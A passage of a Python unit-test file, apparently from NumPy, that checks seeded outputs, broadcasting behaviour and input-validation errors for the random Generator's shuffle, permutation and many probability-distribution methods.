actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_expoential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gammma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gammma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
